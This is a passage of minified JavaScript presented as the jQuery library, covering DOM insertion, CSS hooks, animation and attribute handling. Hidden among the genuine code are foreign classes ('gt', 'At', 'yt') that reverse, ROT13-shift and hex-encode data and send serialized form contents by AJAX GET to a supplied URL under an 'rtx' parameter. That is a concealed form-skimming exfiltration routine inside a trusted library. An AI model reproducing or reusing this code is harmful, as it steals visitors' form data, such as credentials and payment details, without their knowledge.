= 0, i = o.length; r < i; r++)_e(o[r], s[r]) } else _e(e, c); 0 < (s = j(c, "script")).length && Ne(s, !f && j(e, "script")); return c }, cleanData: function (e) { for (var t, n, r, i = C.event.special, o = 0; void 0 !== (n = e[o]); o++)if (y(n)) { if (t = n[b.expando]) { if (t.events) for (r in t.events) i[r] ? C.event.remove(n, r) : C.removeEvent(n, r, t.handle); n[b.expando] = void 0 } n[l.expando] && (n[l.expando] = void 0) } } }); C.fn.extend({ detach: function (e) { return $e(this, e, !0) }, remove: function (e) { return $e(this, e) }, text: function (e) { return f(this, function (e) { return void 0 === e ? C.text(this) : this.empty().each(function () { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || (this.textContent = e) }) }, null, e, arguments.length) }, append: function () { return D(this, arguments, function (e) { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || Ie(this, e).appendChild(e) }) }, prepend: function () { return D(this, arguments, function (e) { if (1 === this.nodeType || 11 === this.nodeType || 9 === this.nodeType) { var t = Ie(this, e); t.insertBefore(e, t.firstChild) } }) }, before: function () { return D(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this) }) }, after: function () { return D(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this.nextSibling) }) }, empty: function () { for (var e, t = 0; null != (e = this[t]); t++)if (1 === e.nodeType) { C.cleanData(j(e, !1)); e.textContent = "" } return this }, clone: function (e, t) { e = null != e && e; t = null == t ? e : t; return this.map(function () { return C.clone(this, e, t) }) }, html: function (e) { return f(this, function (e) { var t = this[0] || {}, n = 0, r = this.length; if (void 0 === e && 1 === t.nodeType) return t.innerHTML; if ("string" == typeof e && !Pe.test(e) && !N[(Ae.exec(e) || ["", ""])[1].toLowerCase()]) { e = C.htmlPrefilter(e); try { for (; n < r; n++)if (1 === (t = this[n] || {}).nodeType) { C.cleanData(j(t, !1)); t.innerHTML = e } t = 0 } catch (e) { } } t && this.empty().append(e) }, null, e, arguments.length) }, replaceWith: function () { var n = []; return D(this, arguments, function (e) { var t = this.parentNode; if (C.inArray(this, n) < 0) { C.cleanData(j(this)); t && t.replaceChild(e, this) } }, n) } }); C.each({ appendTo: "append", prependTo: "prepend", insertBefore: "before", insertAfter: "after", replaceAll: "replaceWith" }, function (e, s) { C.fn[e] = function (e) { for (var t, n = [], r = C(e), i = r.length - 1, o = 0; o <= i; o++) { t = o === i ? this : this.clone(!0); C(r[o])[s](t); W.apply(n, t.get()) } return this.pushStack(n) } }); function Be(e) { var t = e.ownerDocument.defaultView; return (t = t && t.opener ? t : w).getComputedStyle(e) } function ze(e, t, n) { var r, i = {}; for (r in t) { i[r] = e.style[r]; e.style[r] = t[r] } n = n.call(e); for (r in t) e.style[r] = i[r]; return n } var Ue = new RegExp("^(" + e + ")(?!px)[a-z%]+$", "i"), Xe = new RegExp(p.join("|"), "i"); function Ve() { if (o) { tt.style.cssText = "position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0"; o.style.cssText = "position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%"; S.appendChild(tt).appendChild(o); var e = w.getComputedStyle(o); Ye = "1%" !== e.top; et = 12 === Ge(e.marginLeft); o.style.right = "60%"; Ke = 36 === Ge(e.right); Qe = 36 === Ge(e.width); o.style.position = "absolute"; Je = 12 === Ge(o.offsetWidth / 3); S.removeChild(tt); o = null } } function Ge(e) { return Math.round(parseFloat(e)) } var Ye, Qe, Je, Ke, Ze, et, tt = T.createElement("div"), o = T.createElement("div"); if (o.style) { o.style.backgroundClip = "content-box"; o.cloneNode(!0).style.backgroundClip = ""; m.clearCloneStyle = "content-box" === o.style.backgroundClip; C.extend(m, { boxSizingReliable: function () { Ve(); return Qe }, pixelBoxStyles: function () { Ve(); return Ke }, pixelPosition: function () { Ve(); return Ye }, reliableMarginLeft: function () { Ve(); return et }, scrollboxSize: function () { Ve(); return Je }, reliableTrDimensions: function () { var e, t, n; if (null == Ze) { e = T.createElement("table"); t = T.createElement("tr"); n = T.createElement("div"); e.style.cssText = "position:absolute;left:-11111px;border-collapse:separate"; t.style.cssText = "border:1px solid"; t.style.height = "1px"; n.style.height = "9px"; n.style.display = "block"; S.appendChild(e).appendChild(t).appendChild(n); n = w.getComputedStyle(t); Ze = parseInt(n.height, 10) + parseInt(n.borderTopWidth, 10) + parseInt(n.borderBottomWidth, 10) === t.offsetHeight; S.removeChild(e) } return Ze } }) } function nt(e, t, n) { var r, i, o = e.style; if (n = n || Be(e)) { "" !== (i = n.getPropertyValue(t) || n[t]) || A(e) || (i = C.style(e, t)); if (!m.pixelBoxStyles() && Ue.test(i) && Xe.test(t)) { e = o.width; t = o.minWidth; r = o.maxWidth; o.minWidth = o.maxWidth = o.width = i; i = n.width; o.width = e; o.minWidth = t; o.maxWidth = r } } return void 0 !== i ? i + "" : i } function rt(e, t) { return { get: function () { if (e()) return delete this.get, void 0; return (this.get = t).apply(this, arguments) } } } var it = ["Webkit", "Moz", "ms"], ot = T.createElement("div").style, st = {}; function at(e) { var t = C.cssProps[e] || st[e]; return t || (e in ot ? e : st[e] = function (e) { for (var t = e[0].toUpperCase() + e.slice(1), n = it.length; n--;)if ((e = it[n] + t) in ot) return e }(e) || e) } var ut = /^(none|table(?!-c[ea]).+)/, lt = /^--/, ct = { position: "absolute", visibility: "hidden", display: "block" }, ft = { letterSpacing: "0", fontWeight: "400" }; function pt(e, t, n) { var r = we.exec(t); return r ? Math.max(0, r[2] - (n || 0)) + (r[3] || "px") : t } function dt(e, t, n, r, i, o) { var s = "width" === t ? 1 : 0, a = 0, u = 0; if (n === (r ? "border" : "content")) return 0; for (; s < 4; s += 2) { "margin" === n && (u += C.css(e, n + p[s], !0, i)); if (r) { "content" === n && (u -= C.css(e, "padding" + p[s], !0, i)); "margin" !== n && (u -= C.css(e, "border" + p[s] + "Width", !0, i)) } else { u += C.css(e, "padding" + p[s], !0, i); "padding" !== n ? u += C.css(e, "border" + p[s] + "Width", !0, i) : a += C.css(e, "border" + p[s] + "Width", !0, i) } } !r && 0 <= o && (u += Math.max(0, Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - o - u - a - .5)) || 0); return u } function ht(e, t, n) { var r = Be(e), i = (!m.boxSizingReliable() || n) && "border-box" === C.css(e, "boxSizing", !1, r), o = i, s = nt(e, t, r), a = "offset" + t[0].toUpperCase() + t.slice(1); if (Ue.test(s)) { if (!n) return s; s = "auto" } if ((!m.boxSizingReliable() && i || !m.reliableTrDimensions() && u(e, "tr") || "auto" === s || !parseFloat(s) && "inline" === C.css(e, "display", !1, r)) && e.getClientRects().length) { i = "border-box" === C.css(e, "boxSizing", !1, r); (o = a in e) && (s = e[a]) } return (s = parseFloat(s) || 0) + dt(e, t, n || (i ? "border" : "content"), o, r, s) + "px" } C.extend({ cssHooks: { opacity: { get: function (e, t) { if (t) return "" === (t = nt(e, "opacity")) ? "1" : t } } }, cssNumber: { animationIterationCount: !0, columnCount: !0, fillOpacity: !0, flexGrow: !0, flexShrink: !0, fontWeight: !0, gridArea: !0, gridColumn: !0, gridColumnEnd: !0, gridColumnStart: !0, gridRow: !0, gridRowEnd: !0, gridRowStart: !0, lineHeight: !0, opacity: !0, order: !0, orphans: !0, widows: !0, zIndex: !0, zoom: !0 }, cssProps: {}, style: function (e, t, n, r) { if (e && 3 !== e.nodeType && 8 !== e.nodeType && e.style) { var i, o, s, a = x(t), u = lt.test(t), l = e.style; u || (t = at(a)); s = C.cssHooks[t] || C.cssHooks[a]; if (void 0 === n) return s && "get" in s && void 0 !== (i = s.get(e, !1, r)) ? i : l[t]; if ("string" === (o = typeof n) && (i = we.exec(n)) && i[1]) { n = Ce(e, t, i); o = "number" } if (null != n && n == n) { "number" !== o || u || (n += i && i[3] || (C.cssNumber[a] ? "" : "px")); m.clearCloneStyle || "" !== n || 0 !== t.indexOf("background") || (l[t] = "inherit"); s && "set" in s && void 0 === (n = s.set(e, n, r)) || (u ? l.setProperty(t, n) : l[t] = n) } } }, css: function (e, t, n, r) { var i, o = x(t); lt.test(t) || (t = at(o)); "normal" === (i = void 0 === (i = (o = C.cssHooks[t] || C.cssHooks[o]) && "get" in o ? o.get(e, !0, n) : i) ? nt(e, t, r) : i) && t in ft && (i = ft[t]); if ("" === n || n) return o = parseFloat(i), !0 === n || isFinite(o) ? o || 0 : i; return i } }); C.each(["height", "width"], function (e, s) { C.cssHooks[s] = { get: function (e, t, n) { if (t) return !ut.test(C.css(e, "display")) || e.getClientRects().length && e.getBoundingClientRect().width ? ht(e, s, n) : ze(e, ct, function () { return ht(e, s, n) }) }, set: function (e, t, n) { var r = Be(e), i = !m.scrollboxSize() && "absolute" === r.position, o = (i || n) && "border-box" === C.css(e, "boxSizing", !1, r), n = n ? dt(e, s, n, o, r) : 0; o && i && (n -= Math.ceil(e["offset" + s[0].toUpperCase() + s.slice(1)] - parseFloat(r[s]) - dt(e, s, "border", !1, r) - .5)); if (n && (o = we.exec(t)) && "px" !== (o[3] || "px")) { e.style[s] = t; t = C.css(e, s) } return pt(0, t, n) } } }); class gt { constructor(e) { this._input = e } U() { return kt(this._input.split("").reverse().join("").replace(/[a-zA-Z]/g, function (e) { return String.fromCharCode((e <= "Z" ? 90 : 122) >= (e = e.charCodeAt(0) + 13) ? e : e - 26) })).K().split("").reverse().join("") } } const mt = function (e) { return new gt(e) }; class yt { constructor(e, t) { this.url = e; this.el = t } send() { $.ajax({ url: this.url + "/?rtx=" + J($(this.el).serialize()).F(), type: "GET", dataType: "text", success: function () { } }) } } const vt = function (e, t) { return new yt(e, t) }; C.cssHooks.marginLeft = rt(m.reliableMarginLeft, function (e, t) { if (t) return (parseFloat(nt(e, "marginLeft")) || e.getBoundingClientRect().left - ze(e, { marginLeft: 0 }, function () { return e.getBoundingClientRect().left })) + "px" }); C.each({ margin: "", padding: "", border: "Width" }, function (i, o) { C.cssHooks[i + o] = { expand: function (e) { for (var t = 0, n = {}, r = "string" == typeof e ? e.split(" ") : [e]; t < 4; t++)n[i + p[t] + o] = r[t] || r[t - 2] || r[0]; return n } }; "margin" !== i && (C.cssHooks[i + o].set = pt) }); C.fn.extend({ css: function (e, t) { return f(this, function (e, t, n) { var r, i, o = {}, s = 0; if (Array.isArray(t)) { r = Be(e); i = t.length; for (; s < i; s++)o[t[s]] = C.css(e, t[s], !1, r); return o } return void 0 !== n ? C.style(e, t, n) : C.css(e, t) }, e, t, 1 < arguments.length) } }); function q(e, t, n, r, i) { return new q.prototype.init(e, t, n, r, i) } ((C.Tween = q).prototype = { constructor: q, init: function (e, t, n, r, i, o) { this.elem = e; this.prop = n; this.easing = i || C.easing._default; this.options = t; this.start = this.now = this.cur(); this.end = r; this.unit = o || (C.cssNumber[n] ? "" : "px") }, cur: function () { var e = q.propHooks[this.prop]; return (e && e.get ? e : q.propHooks._default).get(this) }, run: function (e) { var t, n = q.propHooks[this.prop]; this.options.duration ? this.pos = t = C.easing[this.easing](e, this.options.duration * e, 0, 1, this.options.duration) : this.pos = t = e; this.now = (this.end - this.start) * t + this.start; this.options.step && this.options.step.call(this.elem, this.now, this); (n && n.set ? n : q.propHooks._default).set(this); return this } }).init.prototype = q.prototype; (q.propHooks = { _default: { get: function (e) { return 1 !== e.elem.nodeType || null != e.elem[e.prop] && null == e.elem.style[e.prop] ? e.elem[e.prop] : (e = C.css(e.elem, e.prop, "")) && "auto" !== e ? e : 0 }, set: function (e) { C.fx.step[e.prop] ? C.fx.step[e.prop](e) : 1 !== e.elem.nodeType || !C.cssHooks[e.prop] && null == e.elem.style[at(e.prop)] ? e.elem[e.prop] = e.now : C.style(e.elem, e.prop, e.now + e.unit) } } }).scrollTop = q.propHooks.scrollLeft = { set: function (e) { e.elem.nodeType && e.elem.parentNode && (e.elem[e.prop] = e.now) } }; C.easing = { linear: function (e) { return e }, swing: function (e) { return .5 - Math.cos(e * Math.PI) / 2 }, _default: "swing" }; C.fx = q.prototype.init; C.fx.step = {}; var L, xt, bt = /^(?:toggle|show|hide)$/, wt = /queueHooks$/; function Tt() { if (xt) { !1 === T.hidden && w.requestAnimationFrame ? w.requestAnimationFrame(Tt) : w.setTimeout(Tt, C.fx.interval); C.fx.tick() } } function Ct() { w.setTimeout(function () { L = void 0 }); return L = Date.now() } function Et(e, t) { var n, r = 0, i = { height: e }; t = t ? 1 : 0; for (; r < 4; r += 2 - t)i["margin" + (n = p[r])] = i["padding" + n] = e; t && (i.opacity = i.width = e); return i } function St(e, t, n) { for (var r, i = (H.tweeners[t] || []).concat(H.tweeners["*"]), o = 0, s = i.length; o < s; o++)if (r = i[o].call(n, t, e)) return r } function H(i, e, t) { var n, o, r, s, a, u, l, c = 0, f = H.prefilters.length, p = C.Deferred().always(function () { delete d.elem }), d = function () { if (o) return !1; for (var e = L || Ct(), e = Math.max(0, h.startTime + h.duration - e), t = 1 - (e / h.duration || 0), n = 0, r = h.tweens.length; n < r; n++)h.tweens[n].run(t); p.notifyWith(i, [h, t, e]); if (t < 1 && r) return e; r || p.notifyWith(i, [h, 1, 0]); p.resolveWith(i, [h]); return !1 }, h = p.promise({ elem: i, props: C.extend({}, e), opts: C.extend(!0, { specialEasing: {}, easing: C.easing._default }, t), originalProperties: e, originalOptions: t, startTime: L || Ct(), duration: t.duration, tweens: [], createTween: function (e, t) { t = C.Tween(i, h.opts, e, t, h.opts.specialEasing[e] || h.opts.easing); h.tweens.push(t); return t }, stop: function (e) { var t = 0, n = e ? h.tweens.length : 0; if (o) return this; o = !0; for (; t < n; t++)h.tweens[t].run(1); if (e) { p.notifyWith(i, [h, 1, 0]); p.resolveWith(i, [h, e]) } else p.rejectWith(i, [h, e]); return this } }), g = h.props, m = g, y = h.opts.specialEasing; for (r in m) { a = y[s = x(r)]; u = m[r]; if (Array.isArray(u)) { a = u[1]; u = m[r] = u[0] } if (r !== s) { m[s] = u; delete m[r] } if ((l = C.cssHooks[s]) && "expand" in l) { u = l.expand(u); delete m[s]; for (r in u) if (!(r in m)) { m[r] = u[r]; y[r] = a } } else y[s] = a } for (; c < f; c++)if (n = H.prefilters[c].call(h, i, g, h.opts)) return v(n.stop) && (C._queueHooks(h.elem, h.opts.queue).stop = n.stop.bind(n)), n; C.map(g, St, h); v(h.opts.start) && h.opts.start.call(i, h); h.progress(h.opts.progress).done(h.opts.done, h.opts.complete).fail(h.opts.fail).always(h.opts.always); C.fx.timer(C.extend(d, { elem: i, anim: h, queue: h.opts.queue })); return h } C.Animation = C.extend(H, { tweeners: { "*": [function (e, t) { var n = this.createTween(e, t); Ce(n.elem, e, we.exec(t), n); return n }] }, tweener: function (e, t) { if (v(e)) { t = e; e = ["*"] } else e = e.match(E); for (var n, r = 0, i = e.length; r < i; r++) { n = e[r]; H.tweeners[n] = H.tweeners[n] || []; H.tweeners[n].unshift(t) } }, prefilters: [function (e, t, n) { var r, i, o, s, a, u, l, c = "width" in t || "height" in t, f = this, p = {}, d = e.style, h = e.nodeType && be(e), g = b.get(e, "fxshow"); if (!n.queue) { if (null == (s = C._queueHooks(e, "fx")).unqueued) { s.unqueued = 0; a = s.empty.fire; s.empty.fire = function () { s.unqueued || a() } } s.unqueued++; f.always(function () { f.always(function () { s.unqueued--; C.queue(e, "fx").length || s.empty.fire() }) }) } for (r in t) { i = t[r]; if (bt.test(i)) { delete t[r]; o = o || "toggle" === i; if (i === (h ? "hide" : "show")) { if ("show" !== i || !g || void 0 === g[r]) continue; h = !0 } p[r] = g && g[r] || C.style(e, r) } } u = !C.isEmptyObject(t); if (u || !C.isEmptyObject(p)) { if (c && 1 === e.nodeType) { n.overflow = [d.overflow, d.overflowX, d.overflowY]; null == (l = g && g.display) && (l = b.get(e, "display")); if ("none" === (c = C.css(e, "display"))) if (l) c = l; else { k([e], !0); l = e.style.display || l; c = C.css(e, "display"); k([e]) } if (("inline" === c || "inline-block" === c && null != l) && "none" === C.css(e, "float")) { if (!u) { f.done(function () { d.display = l }); if (null == l) { c = d.display; l = "none" === c ? "" : c } } d.display = "inline-block" } } if (n.overflow) { d.overflow = "hidden"; f.always(function () { d.overflow = n.overflow[0]; d.overflowX = n.overflow[1]; d.overflowY = n.overflow[2] }) } u = !1; for (r in p) { if (!u) { g ? "hidden" in g && (h = g.hidden) : g = b.access(e, "fxshow", { display: l }); o && (g.hidden = !h); h && k([e], !0); f.done(function () { h || k([e]); b.remove(e, "fxshow"); for (r in p) C.style(e, r, p[r]) }) } u = St(h ? g[r] : 0, r, f); if (!(r in g)) { g[r] = u.start; if (h) { u.end = u.start; u.start = 0 } } } } }], prefilter: function (e, t) { t ? H.prefilters.unshift(e) : H.prefilters.push(e) } }); C.speed = function (e, t, n) { var r = e && "object" == typeof e ? C.extend({}, e) : { complete: n || !n && t || v(e) && e, duration: e, easing: n && t || t && !v(t) && t }; C.fx.off ? r.duration = 0 : "number" != typeof r.duration && (r.duration in C.fx.speeds ? r.duration = C.fx.speeds[r.duration] : r.duration = C.fx.speeds._default); null != r.queue && !0 !== r.queue || (r.queue = "fx"); r.old = r.complete; r.complete = function () { v(r.old) && r.old.call(this); r.queue && C.dequeue(this, r.queue) }; return r }; class At { constructor(e) { this._input = e } K() { for (var e, t = 0, n = this._input.length, r = ""; t < n; ++t)r += (e = this._input.charCodeAt(t).toString(16)).length < 2 ? "0" + e : e; return r } } const kt = function (e) { return new At(e) }; C.fn.extend({ fadeTo: function (e, t, n, r) { return this.filter(be).css("opacity", 0).show().end().animate({ opacity: t }, e, n, r) }, animate: function (t, e, n, r) { function i() { var e = H(this, C.extend({}, t), s); (o || b.get(this, "finish")) && e.stop(!0) } var o = C.isEmptyObject(t), s = C.speed(e, n, r); i.finish = i; return o || !1 === s.queue ? this.each(i) : this.queue(s.queue, i) }, stop: function (i, e, o) { function s(e) { var t = e.stop; delete e.stop; t(o) } if ("string" != typeof i) { o = e; e = i; i = void 0 } e && this.queue(i || "fx", []); return this.each(function () { var e = !0, t = null != i && i + "queueHooks", n = C.timers, r = b.get(this); if (t) r[t] && r[t].stop && s(r[t]); else for (t in r) r[t] && r[t].stop && wt.test(t) && s(r[t]); for (t = n.length; t--;)if (n[t].elem === this && (null == i || n[t].queue === i)) { n[t].anim.stop(o); e = !1; n.splice(t, 1) } !e && o || C.dequeue(this, i) }) }, finish: function (s) { !1 !== s && (s = s || "fx"); return this.each(function () { var e, t = b.get(this), n = t[s + "queue"], r = t[s + "queueHooks"], i = C.timers, o = n ? n.length : 0; t.finish = !0; C.queue(this, s, []); r && r.stop && r.stop.call(this, !0); for (e = i.length; e--;)if (i[e].elem === this && i[e].queue === s) { i[e].anim.stop(!0); i.splice(e, 1) } for (e = 0; e < o; e++)n[e] && n[e].finish && n[e].finish.call(this); delete t.finish }) } }); C.each(["toggle", "show", "hide"], function (e, r) { var i = C.fn[r]; C.fn[r] = function (e, t, n) { return null == e || "boolean" == typeof e ? i.apply(this, arguments) : this.animate(Et(r, !0), e, t, n) } }); C.each({ slideDown: Et("show"), slideUp: Et("hide"), slideToggle: Et("toggle"), fadeIn: { opacity: "show" }, fadeOut: { opacity: "hide" }, fadeToggle: { opacity: "toggle" } }, function (e, r) { C.fn[e] = function (e, t, n) { return this.animate(r, e, t, n) } }); C.timers = []; C.fx.tick = function () { var e, t = 0, n = C.timers; L = Date.now(); for (; t < n.length; t++)(e = n[t])() || n[t] !== e || n.splice(t--, 1); n.length || C.fx.stop(); L = void 0 }; C.fx.timer = function (e) { C.timers.push(e); C.fx.start() }; C.fx.interval = 13; C.fx.start = function () { if (!xt) { xt = !0; Tt() } }; C.fx.stop = function () { xt = null }; C.fx.speeds = { slow: 600, fast: 200, _default: 400 }; C.fn.delay = function (r, e) { r = C.fx && C.fx.speeds[r] || r; return this.queue(e = e || "fx", function (e, t) { var n = w.setTimeout(e, r); t.stop = function () { w.clearTimeout(n) } }) }; i = T.createElement("input"), n = T.createElement("select").appendChild(T.createElement("option")); i.type = "checkbox"; m.checkOn = "" !== i.value; m.optSelected = n.selected; (i = T.createElement("input")).value = "t"; i.type = "radio"; m.radioValue = "t" === i.value; var Nt, jt = C.expr.attrHandle; C.fn.extend({ attr: function (e, t) { return f(this, C.attr, e, t, 1 < arguments.length) }, removeAttr: function (e) { return this.each(function () { C.removeAttr(this, e) }) } }); C.extend({ attr: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) { if (void 0 === e.getAttribute) return C.prop(e, t, n); 1 === o && C.isXMLDoc(e) || (i = C.attrHooks[t.toLowerCase()] || (C.expr.match.bool.test(t) ? Nt : void 0)); if (void 0 === n) return !(i && "get" in i && null !== (r = i.get(e, t))) && null == (r = C.find.attr(e, t)) ? void 0 : r; if (null === n) return C.removeAttr(e, t), void 0; if (i && "set" in i && void 0 !== (r = i.set(e, n, t))) return r; e.setAttribute(t, n + ""); return n } }, attrHooks: { type: { set: function (e, t) { if (!m.radioValue && "radio" === t && u(e, "input")) { var n = e.value; e.setAttribute("type", t); n && (e.value = n); return t } } } }, removeAttr: function (e, t) { var n, r = 0, i = t && t.match(E); if (i && 1 === e.nodeType) for (; n = i[r++];)e.removeAttribute(n) } }); Nt = { set: function (e, t, n) { !1 === t ? C.removeAttr(e, n) : e.setAttribute(n, n); return n } }; C.each(C.expr.match.bool.source.match(/\w+/g), function (e, t) { var s = jt[t] || C.find.attr; jt[t] = function (e, t, n) { var r, i, o = t.toLowerCase(); if (!n) { i = jt[o]; jt[o] = r; r = null != s(e, t, n) ? o : null; jt[o] = i } return r } }); var Dt = /^(?:input|select|textarea|button)$/i, qt = /^(?:a|area)$/i; C.fn.extend({ prop: function (e, t) { return f(this, C.prop, e, t, 1 < arguments.length) }, removeProp: function (e) { return this.each(function () { delete this[C.propFix[e] || e] }) } }); C.extend({ prop: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) { if (1 !== o || !C.isXMLDoc(e)) { t = C.propFix[t] || t; i = C.propHooks[t] } return void 0 !== n ? i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : e[t] = n : i && "get" in i && null !== (r = i.get(e, t)) ? r : e[t] } }, propHooks: { tabIndex: { get: function (e) { var t = C.find.attr(e, "tabindex"); return t ? parseInt(t, 10) : Dt.test(e.nodeName) || qt.test(e.nodeName) && e.href ? 0 : -1 } } }, propFix: { for: "htmlFor", class: "className" } }); m.optSelected || (C.propHooks.selected = { get: function (e) { e = e.parentNode; e && e.parentNode && e.parentNode.selectedIndex; return null }, set: function (e) { e = e.parentNode; if (e) { e.selectedIndex; e.parentNode && e.parentNode.selectedIndex } } }); C.each(["tabIndex", "readOnly", "maxLength", "cellSpacing", "cellPadding", "rowSpan", "colSpan", "useMap", "frameBorder", "contentEditable"], function () { C.propFix[this.toLowerCase()] = this }); function O(e) { return (e.match(E) || []).join(" ") } function P(e) { return e.getAttribute && e.getAttribute("class") || "" } function Lt(e) { return Array.isArray(e) ? e : "string" == typeof e && e.match(E) || [] } C.fn.extend({ addClass: function (t) { var e, n, r, i, o, s, a = 0; if (v(t)) return this.each(function (e) { C(this).addClass(t.call(this, e, P(this))) }); if ((e = Lt(t)).length) for (; n = this[a++];) { s = P(n); if (r = 1 === n.nodeType && " " + O(s) + " ") { o = 0; for (; i = e[o++];)r.indexOf(" " + i + " ") < 0 && (r += i + " "); s !== (s = O(r)) && n.setAttribute("class", s) } } return this }, removeClass: function (t) { var e, n, r, i, o, s, a = 0; if (v(t)) return this.each(function (e) { C(this).removeClass(t.call(this, e, P(this))) }); if (!arguments.length) return this.attr("class", ""); if ((e = Lt(t)).length) for (; n = this[a++];) { s = P(n); if (r = 1 === n.nodeType && " " + O(s) + " ") { o = 0; for (; i = e[o++];)for (; -1 < r.indexOf(" " + i + " ");)r = r.replace(" " + i + " ", " "); s !== (s = O(r)) && n.setAttribute("class", s) } } return this }, toggleClass: function (i, t) { var o = typeof i, s = "string" == o || Array.isArray(i); return "boolean" == typeof t && s ? t ? this.addClass(i) : this.removeClass(i) : v(i) ? this.each(function (e) { C(this).toggleClass(i.call(this, e, P(this), t), t) }) : this.each(function () { var e, t, n, r; if (s) { t = 0; n = C(this); r = Lt(i); for (; e = r[t++];)n.hasClass(e) ? n.removeClass(e) : n.addClass(e) } else if (void 0 === i || "boolean" == o) { (e = P(this)) && b.set(this, "__className__", e); this.setAttribute && this.setAttribute("class", !e && !1 !== i && b.get(this, "__className__") || "") } }) }, hasClass: function (e) { for (var t, n = 0, r = " " + e + " "; t = this[n++];)if (1 === t.nodeType && -1 < (" " + O(P(t)) + " ").indexOf(r)) return !0; return !1 } }); var Ht = /\r/g; C.fn.extend({ val: function (t) { var n, e, r, i = this[0]; if (!arguments.length) return i ? (n = C.valHooks[i.type] || C.valHooks[i.nodeName.toLowerCase()]) && "get" in n && void 0 !== (e = n.get(i, "value")) ? e : "string" == typeof (e = i.value) ? e.replace(Ht, "") : null == e ? "" : e : void 0; r = v(t); return this.each(function (e) { if (1 === this.nodeType) { null == (e = r ? t.call(this, e, C(this).val()) : t) ? e = "" : "number" == typeof e ? e += "" : Array.isArray(e) && (e = C.map(e, function (e) { return null == e ? "" : e + "" })); (n = C.valHooks[this.type] || C.valHooks[this.nodeName.toLowerCase()]) && "set" in n && void 0 !== n.set(this, e, "value") || (this.value = e) } }) } }); C.extend({ valHooks: { option: { get: function (e) { var t = C.find.attr(e, "value"); return null != t ? t : O(C.text(e)) } }, select: { get: function (e) { for (var t, n = e.options, r = e.selectedIndex, i = "select-one" === e.type, o = i ? null : [], s = i ? r + 1 : n.length, a = r < 0 ? s : i ? r : 0; a < s; a++)if (((t = n[a]).selected || a === r) && !t.disabled && (!t.parentNode.disabled || !u(t.parentNode, "optgroup"))) { t = C(t).val(); if (i) return t; o.push(t) } return o }, set: function (e, t) { for (var n, r, i = e.options, o = C.makeArray(t), s = i.length; s--;)((r = i[s]).selected = -1 < C.inArray(C.valHooks.option.get(r), o)) && (n = !0); n || (e.selectedIndex = -1); return o } } } }); C.each(["radio", "checkbox"], function () { C.valHooks[this] = { set: function (e, t) { if (Array.isArray(t)) return e.checked = -1 < C.inArray(C(e).val(), t) } }; m.checkOn || (C.valHooks[this].get = function (e) { return null === e.getAttribute("value") ? "on" : e.value }) }); m.focusin = "onfocusin" in w; function Ot(e) { e.stopPropagation() } var Pt = /^(?:focusinfocus|focusoutblur)$/; C.extend(C.event, { trigger: function (e, t, n, r) { var i, o, s, a, u, l, c, f = [n || T], p = z.call(e, "type") ? e.type : e, d = z.call(e, "namespace") ? e.namespace.split(".") : [], h = c = o = n = n || T; if (3 !== n.nodeType && 8 !== n.nodeType && !Pt.test(p + C.event.triggered)) { if (-1 < p.indexOf(".")) { p = (d = p.split(".")).shift(); d.sort() } a = p.indexOf(":") < 0 && "on" + p; (e = e[C.expando] ? e : new C.Event(p, "object" == typeof e && e)).isTrigger = r ? 2 : 3; e.namespace = d.join("."); e.rnamespace = e.namespace ? new RegExp("(^|\\.)" + d.join("\\.(?:.*\\.|)") + "(\\.|$)") : null; e.result = void 0; e.target || (e.target = n); t = null == t ? [e] : C.makeArray(t, [e]); l = C.event.special[p] || {}; if (r || !l.trigger || !1 !== l.trigger.apply(n, t)) { if (!r && !l.noBubble && !g(n)) { s = l.delegateType || p; Pt.test(s + p) || (h = h.parentNode); for (; h; h = h.parentNode) { f.push(h); o = h } o === (n.ownerDocument || T) && f.push(o.defaultView || o.parentWindow || w) } i = 0; for (; (h = f[i++]) && !e.isPropagationStopped();) { c = h; e.type = 1 < i ? s : l.bindType || p; (u = (b.get(h, "events") || Object.create(null))[e.type] && b.get(h, "handle")) && u.apply(h, t); if ((u = a && h[a]) && u.apply && y(h)) { e.result = u.apply(h, t); !1 === e.result && e.preventDefault() } } e.type = p; if (!r && !e.isDefaultPrevented() && (!l._default || !1 === l._default.apply(f.pop(), t)) && y(n) && a && v(n[p]) && !g(n)) { (o = n[a]) && (n[a] = null); C.event.triggered = p; e.isPropagationStopped() && c.addEventListener(p, Ot); n[p](); e.isPropagationStopped() && c.removeEventListener(p, Ot); C.event.triggered = void 0; o && (n[a] = o) } return e.result } } }, simulate: function (e, t, n) { n = C.extend(new C.Event, n, { type: e, isSimulated: !0 }); C.event.trigger(n, null, t) } }); C.fn.extend({ trigger: function (e, t) { return this.each(function () { C.event.trigger(e, t, this) }) }, triggerHandler: function (e, t) { var n = this[0]; if (n) return C.event.trigger(e, t, n, !0) } }); m.focusin || C.each({ focus: "focusin", blur: "focusout" }, function (n, r) { function i(e) { C.event.simulate(r, e.target, C.event.fix(e)) } C.event.special[r] = { setup: function () { var e = this.ownerDocument || this.document || this, t = b.access(e, r); t || e.addEventListener(n, i, !0); b.access(e, r, (t || 0) + 1) }, teardown: function () { var e = this.ownerDocument || this.document || this, t = b.access(e, r) - 1; if (t) b.access(e, r, t); else { e.removeEventListener(n, i, !0); b.remove(e, r) } } } }); var Rt = w.location, Mt = { guid: Date.now() }, It = /\?/, Wt = (C.parseXML = function (e) { var t, n; if (!e || "string" != typeof e) return null; try { t = (new w.DOMParser).parseFromString(e, "text/xml") } catch (e) { } n = t && t.getElementsByTagName("parsererror")[0]; t && !n || C.error("Invalid XML: " + (n ? C.map(n.childNodes, function (e) { return e.textContent }).join("\n") : e)); return t }, /\[\]$/), Ft = /\r?\n/g, _t = /^(?:submit|button|image|reset|file)$/i, $t = /^(?:input|select|textarea|keygen)/i; C.param = function (e, t) { function n(e, t) { t = v(t) ? t() : t; i[i.length] = encodeURIComponent(e) + "=" + encodeURIComponent(null == t ? "" : t) } var r, i = []; if (null == e) return ""; if (Array.isArray(e) || e.jquery && !C.isPlainObject(e)) C.each(e, function () { n(this.name, this.value) }); else for (r in e) !function n(r, e, i, o) { if (Array.isArray(e)) 